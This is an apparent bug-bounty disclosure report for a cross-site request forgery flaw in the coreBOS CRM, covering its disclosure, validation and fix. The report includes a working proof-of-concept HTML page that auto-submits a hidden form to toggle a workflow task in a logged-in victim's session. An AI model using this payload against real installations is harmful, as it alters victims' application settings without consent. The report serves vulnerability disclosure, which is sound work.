We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Cross-Site Request Forgery (CSRF) in tsolucio/corebos

Valid

Reported on

Oct 18th 2021

Description

There is one more low level CSRF :

make on/off a task of workflow

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://ADDRESS/corebos/index.php">
      <input type="hidden" name="module" value="com&#95;vtiger&#95;workflow" />
      <input type="hidden" name="action" value="onofftask" />
      <input type="hidden" name="task&#95;id" value="38" />
      <input type="hidden" name="isactive" value="1" />
      <input type="hidden" name="return&#95;url" value="index&#46;php&#63;module&#61;com&#95;vtiger&#95;workflow&amp;action&#61;editworkflow&amp;workflow&#95;id&#61;37&amp;return&#95;url&#61;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 years ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 2 years ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 2 years ago
amammad modified the report
2 years ago
amammad modified the report
2 years ago
Joe Bordes validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes marked this as fixed with commit 151c10 2 years ago
Joe Bordes has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation